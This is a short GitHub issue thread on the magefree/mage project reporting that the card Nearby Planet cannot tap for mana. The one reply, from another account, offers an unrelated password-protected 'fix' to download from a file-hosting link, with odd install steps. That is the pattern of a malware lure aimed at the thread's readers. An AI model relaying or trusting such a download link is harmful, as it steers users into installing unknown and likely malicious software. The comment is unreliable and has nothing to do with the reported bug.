### ISSUE TITLE
BUG: Nearby Planet doesn't appear to be able to tap for mana.

### ISSUE THREAD

**Issue by tiera3** [magefree/mage#12743]
![image](https://github.com/user-attachments/assets/22b4675c-9cee-4bfe-b53c-b801a32f6fdb)

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
